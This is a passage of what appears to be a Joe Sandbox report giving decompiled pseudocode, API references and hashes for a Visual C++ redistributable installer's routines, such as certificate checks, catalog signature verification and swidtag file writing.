                                                                          									 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 8)) - _v52 + _t129;
                                                                          									if(_v36 >= _v56) {
                                                                          										if(_v31 != 0xa) {
                                                                          											goto L16;
                                                                          										} else {
                                                                          											_t105 = 0xd;
                                                                          											_v32 = _t105;
                                                                          											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                          												goto L19;
                                                                          											} else {
                                                                          												if(_v36 >= 1) {
                                                                          													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
                                                                          													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
                                                                          													goto L16;
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					goto L20;
                                                                          					L16:
                                                                          				}
                                                                          				L20:
                                                                          				return E0003DE36(_t115, _v8 ^ _t131, _t128, _t129, _t130);
                                                                          			}

                                                                          APIs
                                                                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0004D132,?,00000000,?,00000000,00000000), ref: 0004C9FF
                                                                          • __fassign.LIBCMT ref: 0004CA7A
                                                                          • __fassign.LIBCMT ref: 0004CA95
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0004CABB
                                                                          • WriteFile.KERNEL32(?,?,00000000,0004D132,00000000,?,?,?,?,?,?,?,?,?,0004D132,?), ref: 0004CADA
                                                                          • WriteFile.KERNEL32(?,?,00000001,0004D132,00000000,?,?,?,?,?,?,?,?,?,0004D132,?), ref: 0004CB13
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                          • String ID: @Met
                                                                          • API String ID: 1324828854-2381362037
                                                                          • Opcode ID: 1af2a0bf3a44cbe3018b6165db5a018bff79898c225358a7437c2b75c5576026
                                                                          • Instruction ID: 91606681775ccba13f07af6c1a2d972738417b5a3138d4493ea42a4d87e4ae16
                                                                          • Opcode Fuzzy Hash: 1af2a0bf3a44cbe3018b6165db5a018bff79898c225358a7437c2b75c5576026
                                                                          • Instruction Fuzzy Hash: 7251C3B1E01249AFEB50CFA8DC45EEEBBF4EF09300F14412AE555E7291E730A950CBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 52%
                                                                          			E00019DB4(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				void* _t34;
                                                                          				intOrPtr _t35;
                                                                          				void* _t36;
                                                                          				void* _t43;
                                                                          				void* _t48;
                                                                          				void* _t50;
                                                                          				void* _t53;
                                                                          				intOrPtr _t58;
                                                                          				intOrPtr* _t59;
                                                                          				void* _t61;
                                                                          				void* _t62;
                                                                          
                                                                          				_t47 = _a8;
                                                                          				_t59 = _a4;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				_v20 = 0;
                                                                          				_v8 = 0;
                                                                          				if(E000171CF(_a8,  *((intOrPtr*)(_t59 + 0x18)),  &_v16, 0) >= 0) {
                                                                          					if( *((intOrPtr*)(_t59 + 0x14)) == 0) {
                                                                          						L5:
                                                                          						_push( &_v8);
                                                                          						_push( &_v12);
                                                                          						_push(_v16);
                                                                          						if(_v20 == 0) {
                                                                          							_t34 = E00052C2D(_t48);
                                                                          						} else {
                                                                          							_push(_v20);
                                                                          							_t34 = E000526E7(_t48);
                                                                          						}
                                                                          						_t61 = _t34;
                                                                          						_t35 = _v12;
                                                                          						_t58 = 4;
                                                                          						if(_t35 != 0xfffffffc) {
                                                                          							if(_t35 == 0xffffffff || _t35 == 0xfffffff9) {
                                                                          								_t35 = 2;
                                                                          								goto L17;
                                                                          							} else {
                                                                          								if(_t35 == 2 || _t35 == 3 || _t35 == _t58) {
                                                                          									goto L18;
                                                                          								} else {
                                                                          									_t61 = 0x80070057;
                                                                          									E0005012F(0x80070057, "Failed to get component path: %d", _t35);
                                                                          									_t62 = _t62 + 0xc;
                                                                          									goto L35;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t35 = _t58;
                                                                          							L17:
                                                                          							_v12 = _t35;
                                                                          							L18:
                                                                          							_t50 =  *((intOrPtr*)(_t59 + 0x10)) - 1;
                                                                          							if(_t50 == 0) {
                                                                          								if(_t35 == 2 || _t35 == 3 || _t35 == _t58) {
                                                                          									L30:
                                                                          									_t36 = E000180F6(_t47,  *((intOrPtr*)(_t59 + 4)), _v8, 0);
                                                                          									L31:
                                                                          									_t61 = _t36;
                                                                          									goto L32;
                                                                          								} else {
                                                                          									L32:
                                                                          									if(_t61 >= 0) {
                                                                          										L36:
                                                                          										E00012793(_v16);
                                                                          										E00012793(_v20);
                                                                          										if(_v8 != 0) {
                                                                          											E000554EF(_v8);
                                                                          										}
                                                                          										return _t61;
                                                                          									}
                                                                          									_push("Failed to set variable.");
                                                                          									L34:
                                                                          									_push(_t61);
                                                                          									E0005012F();
                                                                          									L35:
                                                                          									_push(_t61);
                                                                          									E0005061A(2, "MsiComponentSearch failed: ID \'%ls\', HRESULT 0x%x",  *_t59);
                                                                          									goto L36;
                                                                          								}
                                                                          							}
                                                                          							_t53 = _t50 - 1;
                                                                          							if(_t53 == 0) {
                                                                          								asm("cdq");
                                                                          								_t36 = E00018152(_t47,  *((intOrPtr*)(_t59 + 4)), _t35, _t58, 0);
                                                                          								goto L31;
                                                                          							}
                                                                          							if(_t53 != 1 || _t35 != 2 && _t35 != 3 && _t35 != _t58) {
                                                                          								goto L32;
                                                                          							} else {
                                                                          								_t43 = E0003F878(_v8, 0x5c);
                                                                          								if(_t43 != 0) {
                                                                          									 *((short*)(_t43 + 2)) = 0;
                                                                          								}
                                                                          								goto L30;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					_t61 = E000171CF(_t47,  *((intOrPtr*)(_t59 + 0x14)),  &_v20, 0);
                                                                          					if(_t61 >= 0) {
                                                                          						goto L5;
                                                                          					}
                                                                          					_push("Failed to format product code string.");
                                                                          					goto L34;
                                                                          				}
                                                                          				_push("Failed to format component id string.");
                                                                          				goto L34;
                                                                          			}



















                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019DDA
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 00019DFF
                                                                          Strings
                                                                          • Failed to format component id string., xrefs: 00019DE5
                                                                          • Failed to set variable., xrefs: 00019EE3
                                                                          • Failed to format product code string., xrefs: 00019E0A
                                                                          • Failed to get component path: %d, xrefs: 00019E63
                                                                          • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00019EF3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Open@16
                                                                          • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                          • API String ID: 3613110473-1671347822
                                                                          • Opcode ID: 0721e35af5a182678299cff9ad3916e6a3504a350a6348abf4f2400377142c9a
                                                                          • Instruction ID: 2cb3bf1b0f09b2ac9f7a0ca48c61d580a48ad0547e2a6e28367f5b6409767666
                                                                          • Opcode Fuzzy Hash: 0721e35af5a182678299cff9ad3916e6a3504a350a6348abf4f2400377142c9a
                                                                          • Instruction Fuzzy Hash: B041E632900215BACB75DAA8CC62AFFB6E9EF04310F244A26F505E5192D7319ED0D792
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 45%
                                                                          			E00029080(intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				char _v28;
                                                                          				signed int _v32;
                                                                          				char _v36;
                                                                          				char _v40;
                                                                          				signed int _v44;
                                                                          				intOrPtr _v48;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t40;
                                                                          				intOrPtr _t44;
                                                                          				signed short _t57;
                                                                          				void* _t64;
                                                                          				void* _t71;
                                                                          				void* _t72;
                                                                          				signed int _t73;
                                                                          				intOrPtr _t79;
                                                                          				char* _t80;
                                                                          				void* _t82;
                                                                          				signed int _t87;
                                                                          				void* _t88;
                                                                          
                                                                          				_t40 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t40 ^ _t87;
                                                                          				_t79 = _a8;
                                                                          				_t80 =  &_v28;
                                                                          				_v36 = 0x14;
                                                                          				asm("stosd");
                                                                          				_v32 = 0;
                                                                          				_t72 = 0x80070490;
                                                                          				_v40 = 0;
                                                                          				_t73 = 0;
                                                                          				_v48 = _t79;
                                                                          				asm("stosd");
                                                                          				_v44 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t44 =  *((intOrPtr*)( *((intOrPtr*)(_t79 + 0x10))));
                                                                          				if( *((intOrPtr*)(_t44 + 0xc)) <= 0) {
                                                                          					L12:
                                                                          					_t82 = _t72;
                                                                          					if(_t72 >= 0) {
                                                                          						L15:
                                                                          						_t45 = _v32;
                                                                          						if(_v32 != 0) {
                                                                          							E00013999(_t45);
                                                                          						}
                                                                          						return E0003DE36(_t72, _v8 ^ _t87, _t79, _t80, _t82);
                                                                          					}
                                                                          					_push("Failed to find expected public key in certificate chain.");
                                                                          					_push(_t72);
                                                                          					L14:
                                                                          					E0005012F();
                                                                          					goto L15;
                                                                          				}
                                                                          				_t80 = _a4;
                                                                          				while(1) {
                                                                          					_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x10)) + _t73 * 4)) + 4));
                                                                          					_push( &_v36);
                                                                          					_push( &_v28);
                                                                          					_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x10)) + _t73 * 4)) + 4)) + 0xc)) + 0x38);
                                                                          					_push(1);
                                                                          					_push(0);
                                                                          					_push(0x8004);
                                                                          					_push(0);
                                                                          					if( *0x7a93c() == 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t60 = _v36;
                                                                          					if( *((intOrPtr*)(_t80 + 0x24)) != _v36) {
                                                                          						L11:
                                                                          						_t73 = _v44 + 1;
                                                                          						_v44 = _t73;
                                                                          						_t44 =  *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x10))));
                                                                          						if(_t73 <  *((intOrPtr*)(_t44 + 0xc))) {
                                                                          							continue;
                                                                          						}
                                                                          						goto L12;
                                                                          					}
                                                                          					_t64 = E0003F919( *((intOrPtr*)(_t80 + 0x20)),  &_v28, _t60);
                                                                          					_t88 = _t88 + 0xc;
                                                                          					if(_t64 != 0) {
                                                                          						goto L11;
                                                                          					}
                                                                          					if( *((intOrPtr*)(_t80 + 0x28)) == _t64) {
                                                                          						_t72 = 0;
                                                                          						goto L12;
                                                                          					}
                                                                          					_t82 = E00055587(_t73, _t83, 3,  &_v32,  &_v40);
                                                                          					if(_t82 < 0) {
                                                                          						_push("Failed to read certificate thumbprint.");
                                                                          						L20:
                                                                          						_push(_t82);
                                                                          						goto L14;
                                                                          					}
                                                                          					_t68 = _v40;
                                                                          					if( *((intOrPtr*)(_t80 + 0x2c)) != _v40) {
                                                                          						L9:
                                                                          						_t69 = _v32;
                                                                          						if(_v32 != 0) {
                                                                          							E00013999(_t69);
                                                                          							_v32 = _v32 & 0x00000000;
                                                                          						}
                                                                          						goto L11;
                                                                          					}
                                                                          					_t71 = E0003F919( *((intOrPtr*)(_t80 + 0x28)), _v32, _t68);
                                                                          					_t88 = _t88 + 0xc;
                                                                          					if(_t71 == 0) {
                                                                          						_t82 = 0;
                                                                          						goto L15;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				_t57 = GetLastError();
                                                                          				_t86 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          				_t82 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          				E000137D3(0x80004005, "cache.cpp", 0x7c4, _t82);
                                                                          				_push("Failed to get certificate public key identifier.");
                                                                          				goto L20;
                                                                          			}


























                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00029177
                                                                          0x0002910e
                                                                          0x00029113
                                                                          0x00029118
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002911d
                                                                          0x000291be
                                                                          0x00000000
                                                                          0x000291be
                                                                          0x00029133
                                                                          0x00029137
                                                                          0x000291b6
                                                                          0x000291bb
                                                                          0x000291bb
                                                                          0x00000000
                                                                          0x000291bb
                                                                          0x00029139
                                                                          0x0002913f
                                                                          0x00029154
                                                                          0x00029154
                                                                          0x00029159
                                                                          0x0002915c
                                                                          0x00029161
                                                                          0x00029161
                                                                          0x00000000
                                                                          0x00029159
                                                                          0x00029148
                                                                          0x0002914d
                                                                          0x00029152
                                                                          0x000291b2
                                                                          0x00000000
                                                                          0x000291b2
                                                                          0x00000000
                                                                          0x00029152
                                                                          0x000291c2
                                                                          0x000291d3
                                                                          0x000291dd
                                                                          0x000291eb
                                                                          0x000291f0
                                                                          0x00000000

                                                                          APIs
                                                                          • _memcmp.LIBVCRUNTIME ref: 0002910E
                                                                            • Part of subcall function 00055587: GetLastError.KERNEL32(?,?,00029133,?,00000003,00000000,?), ref: 000555A6
                                                                          • _memcmp.LIBVCRUNTIME ref: 00029148
                                                                          • GetLastError.KERNEL32 ref: 000291C2
                                                                          Strings
                                                                          • Failed to get certificate public key identifier., xrefs: 000291F0
                                                                          • Failed to find expected public key in certificate chain., xrefs: 00029183
                                                                          • cache.cpp, xrefs: 000291E6
                                                                          • Failed to read certificate thumbprint., xrefs: 000291B6
                                                                          • @Met, xrefs: 000291C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast_memcmp
                                                                          • String ID: @Met$Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                          • API String ID: 3428363238-519595906
                                                                          • Opcode ID: 6fdbcfe07cfb25af8444e138f84b56acd5f962d9dde94ceb769a33df90526557
                                                                          • Instruction ID: cab7ed83918676314da8491fdbbd0a81b29a57ba566aa5fedf9f08965a8a5304
                                                                          • Opcode Fuzzy Hash: 6fdbcfe07cfb25af8444e138f84b56acd5f962d9dde94ceb769a33df90526557
                                                                          • Instruction Fuzzy Hash: A8417F71E00226AFEB50DBA9D845AEEB7F9AF08714F004129FA05EB241D774ED50CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E0001F2DC(void* __ebx, intOrPtr _a4, void* _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char _v20;
                                                                          				intOrPtr _t49;
                                                                          				intOrPtr* _t52;
                                                                          				char _t54;
                                                                          				intOrPtr* _t58;
                                                                          				char _t59;
                                                                          
                                                                          				_t58 = _a8;
                                                                          				_t59 = 0;
                                                                          				_v16 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v20 = 0;
                                                                          				if( *((intOrPtr*)(_t58 + 4)) <= 0) {
                                                                          					L22:
                                                                          					return _t59;
                                                                          				}
                                                                          				_t54 = 0;
                                                                          				_a8 = 0;
                                                                          				while(1) {
                                                                          					_t52 =  *_t58 + _t54;
                                                                          					_t59 = E000171CF(_a4,  *((intOrPtr*)(_t52 + 8)),  &_v16, 0);
                                                                          					if(_t59 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t59 = E00012D79(_t54, _v16, L"swidtag",  &_v8);
                                                                          					if(_t59 < 0) {
                                                                          						_push("Failed to allocate regid folder path.");
                                                                          						L15:
                                                                          						_push(_t59);
                                                                          						E0005012F();
                                                                          						L16:
                                                                          						if(_v12 != 0) {
                                                                          							E000554EF(_v12);
                                                                          						}
                                                                          						if(_v8 != 0) {
                                                                          							E000554EF(_v8);
                                                                          						}
                                                                          						if(_v16 != 0) {
                                                                          							E000554EF(_v16);
                                                                          						}
                                                                          						goto L22;
                                                                          					}
                                                                          					_t59 = E00012D79(_t54, _v8,  *_t52,  &_v12);
                                                                          					if(_t59 < 0) {
                                                                          						_push("Failed to allocate regid file path.");
                                                                          						goto L15;
                                                                          					}
                                                                          					_t59 = E00014013(_v8, 0);
                                                                          					if(_t59 < 0) {
                                                                          						_push(_v8);
                                                                          						_push("Failed to create regid folder: %ls");
                                                                          						L11:
                                                                          						_push(_t59);
                                                                          						E0005012F();
                                                                          						goto L16;
                                                                          					}
                                                                          					_t59 = E00054C67(_t54, _v12, 0x80,  *(_t52 + 0xc), lstrlenA( *(_t52 + 0xc)), 0);
                                                                          					if(_t59 < 0) {
                                                                          						_push(_v12);
                                                                          						_push("Failed to write tag xml to file: %ls");
                                                                          						goto L11;
                                                                          					}
                                                                          					_t49 = _v20 + 1;
                                                                          					_t54 = _a8 + 0x10;
                                                                          					_v20 = _t49;
                                                                          					_t22 = _t58 + 4; // 0x8680a79
                                                                          					_push(0);
                                                                          					_a8 = _t54;
                                                                          					_pop(0);
                                                                          					if(_t49 <  *_t22) {
                                                                          						continue;
                                                                          					}
                                                                          					goto L16;
                                                                          				}
                                                                          				_push("Failed to format tag folder path.");
                                                                          				goto L15;
                                                                          			}













                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 0001F315
                                                                            • Part of subcall function 00014013: CreateDirectoryW.KERNELBASE(0001533D,000153B5,00000000,00000000,?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D), ref: 00014021
                                                                            • Part of subcall function 00014013: GetLastError.KERNEL32(?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000,00000000), ref: 0001402F
                                                                          • lstrlenA.KERNEL32(0005B4F0,00000000,00000094,00000000,00000094,?,?,00020328,swidtag,00000094,?,0005B508,00020328,00000000,?,00000000), ref: 0001F368
                                                                            • Part of subcall function 00054C67: CreateFileW.KERNEL32(0005B4F0,40000000,00000001,00000000,00000002,00000080,00000000,00020328,00000000,?,0001F37F,?,00000080,0005B4F0,00000000), ref: 00054C7F
                                                                            • Part of subcall function 00054C67: GetLastError.KERNEL32(?,0001F37F,?,00000080,0005B4F0,00000000,?,00020328,?,00000094,?,?,?,?,?,00000000), ref: 00054C8C
                                                                          Strings
                                                                          • Failed to allocate regid folder path., xrefs: 0001F3C7
                                                                          • Failed to create regid folder: %ls, xrefs: 0001F3B0
                                                                          • Failed to write tag xml to file: %ls, xrefs: 0001F3A6
                                                                          • Failed to format tag folder path., xrefs: 0001F3CE
                                                                          • swidtag, xrefs: 0001F328
                                                                          • Failed to allocate regid file path., xrefs: 0001F3C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                          • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                          • API String ID: 904508749-1201533908
                                                                          • Opcode ID: 5cd1427b1a6b92a2e10981fec4b76a4aa13d55481e552ebf53fc7a5648bcb40c
                                                                          • Instruction ID: ddba3142c0a27a899c12b43c04c9091d4d0a48c214a7795b59cfa8ca00b84d1c
                                                                          • Opcode Fuzzy Hash: 5cd1427b1a6b92a2e10981fec4b76a4aa13d55481e552ebf53fc7a5648bcb40c
                                                                          • Instruction Fuzzy Hash: E8319032D0061AFFCB119F94DC02BEEBBB5AF04711F148176FA14AA251D7719E909B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 80%
                                                                          			E00055C68(void* __ecx, intOrPtr _a4, WCHAR** _a8, void** _a12, signed int* _a16) {
                                                                          				signed int _v8;
                                                                          				char _v12;
                                                                          				void* _t22;
                                                                          				signed short _t26;
                                                                          				signed short _t31;
                                                                          				signed int* _t35;
                                                                          				intOrPtr _t38;
                                                                          				WCHAR** _t41;
                                                                          				void* _t43;
                                                                          				void* _t45;
                                                                          
                                                                          				_t35 = _a16;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				 *_t35 = 0;
                                                                          				_t35[1] = 0;
                                                                          				_t41 = _a8;
                                                                          				_t45 = E00011F20(_t41, L"%ls.R", _a4);
                                                                          				if(_t45 < 0) {
                                                                          					L13:
                                                                          					return _t45;
                                                                          				}
                                                                          				_t43 = CreateFileW( *_t41, 0xc0000000, 4, 0, 4, 0x80, 0);
                                                                          				if(_t43 != 0xffffffff) {
                                                                          					_t38 = _v8;
                                                                          					while(1) {
                                                                          						_push(0);
                                                                          						_push( &_v12);
                                                                          						_t22 = 8;
                                                                          						if(ReadFile(_t43, _t38 + _t35, _t22 - _t38, ??, ??) == 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t38 = _v8 + _v12;
                                                                          						_v8 = _t38;
                                                                          						if(_v12 == 0 || _t38 >= 8) {
                                                                          							if(_t38 != 8) {
                                                                          								 *_t35 =  *_t35 & 0x00000000;
                                                                          								_t35[1] = _t35[1] & 0x00000000;
                                                                          							}
                                                                          							 *_a12 = _t43;
                                                                          							_t43 = _t43 | 0xffffffff;
                                                                          							L11:
                                                                          							if(_t43 != 0xffffffff) {
                                                                          								CloseHandle(_t43);
                                                                          							}
                                                                          							goto L13;
                                                                          						} else {
                                                                          							continue;
                                                                          						}
                                                                          					}
                                                                          					_t26 = GetLastError();
                                                                          					_t49 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
                                                                          					_t45 =  >=  ? 0x80004005 :  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "dlutil.cpp", 0xc8, _t45);
                                                                          					goto L11;
                                                                          				}
                                                                          				_t31 = GetLastError();
                                                                          				_t52 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          				_t45 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          				E000137D3(0x80004005, "dlutil.cpp", 0xc1, _t45);
                                                                          				goto L13;
                                                                          			}














                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00055CB2
                                                                          • GetLastError.KERNEL32 ref: 00055CBF
                                                                          • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00055D06
                                                                          • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00055D6E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                          • String ID: %ls.R$@Met$dlutil.cpp
                                                                          • API String ID: 2136311172-3285545792
                                                                          • Opcode ID: e285a5bcd5e5530c1910a304e545c77a39a7598b08f2672d7575cbc626e8fff8
                                                                          • Instruction ID: 2f2d7103c78f53fb92b1756c643f21e8fe8256a25fd85c113366369a4a7c8392
                                                                          • Opcode Fuzzy Hash: e285a5bcd5e5530c1910a304e545c77a39a7598b08f2672d7575cbc626e8fff8
                                                                          • Instruction Fuzzy Hash: 7931AF72A40714AFEB208B68CC49BAB7AF8EF05722F114219FE05EB1D0D7759D0586B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 49%
                                                                          			E0001C7DF(void* __edx, void* _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				void* __ecx;
                                                                          				void* _t30;
                                                                          				signed short _t31;
                                                                          				intOrPtr _t37;
                                                                          				intOrPtr* _t39;
                                                                          				char _t42;
                                                                          				void* _t47;
                                                                          				void* _t50;
                                                                          				char _t53;
                                                                          
                                                                          				_t47 = __edx;
                                                                          				_push(_t41);
                                                                          				_t39 = _a4;
                                                                          				_t53 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				if( *((intOrPtr*)(_t39 + 4)) > 0) {
                                                                          					_t42 = 0;
                                                                          					_a4 = 0;
                                                                          					while(1) {
                                                                          						_t50 =  *_t39 + _t42;
                                                                          						_t7 = _t50 + 4; // 0x4680a79
                                                                          						_t53 = E0001CC57(_t42, _a8,  *_t7,  &_v8);
                                                                          						if(_t53 < 0) {
                                                                          							break;
                                                                          						}
                                                                          						_t10 = _t50 + 8; // 0x152bd
                                                                          						_t53 = E000121A5(_t10,  *((intOrPtr*)(_v8 + 0x50)), 0);
                                                                          						if(_t53 < 0) {
                                                                          							_push("Failed to get catalog local file path");
                                                                          							L13:
                                                                          							_push(_t53);
                                                                          							E0005012F();
                                                                          						} else {
                                                                          							_t12 = _t50 + 8; // 0xe90005ba
                                                                          							_t30 = CreateFileW( *_t12, 0x80000000, 5, 0, 3, 0x8000000, 0);
                                                                          							 *(_t50 + 0xc) = _t30;
                                                                          							if(_t30 == 0xffffffff) {
                                                                          								_t31 = GetLastError();
                                                                          								_t57 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          								_t53 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "catalog.cpp", 0x76, _t53);
                                                                          								_t22 = _t50 + 8; // 0xe90005ba
                                                                          								_push( *_t22);
                                                                          								_push("Failed to open catalog in working path: %ls");
                                                                          								goto L10;
                                                                          							} else {
                                                                          								_t14 = _t50 + 8; // 0xe90005ba
                                                                          								_t53 = E0002A998(_t47, _v8,  *_t14, _t30);
                                                                          								if(_t53 < 0) {
                                                                          									_t21 = _t50 + 8; // 0xe90005ba
                                                                          									_push( *_t21);
                                                                          									_push("Failed to verify catalog signature: %ls");
                                                                          									L10:
                                                                          									_push(_t53);
                                                                          									E0005012F();
                                                                          								} else {
                                                                          									_t37 = _v12 + 1;
                                                                          									_t42 = _a4 + 0x10;
                                                                          									_v12 = _t37;
                                                                          									_a4 = _t42;
                                                                          									_t20 = _t39 + 4; // 0xfffe5de9
                                                                          									if(_t37 <  *_t20) {
                                                                          										continue;
                                                                          									} else {
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          					_push("Failed to find payload for catalog file.");
                                                                          					goto L13;
                                                                          				}
                                                                          				L15:
                                                                          				return _t53;
                                                                          			}















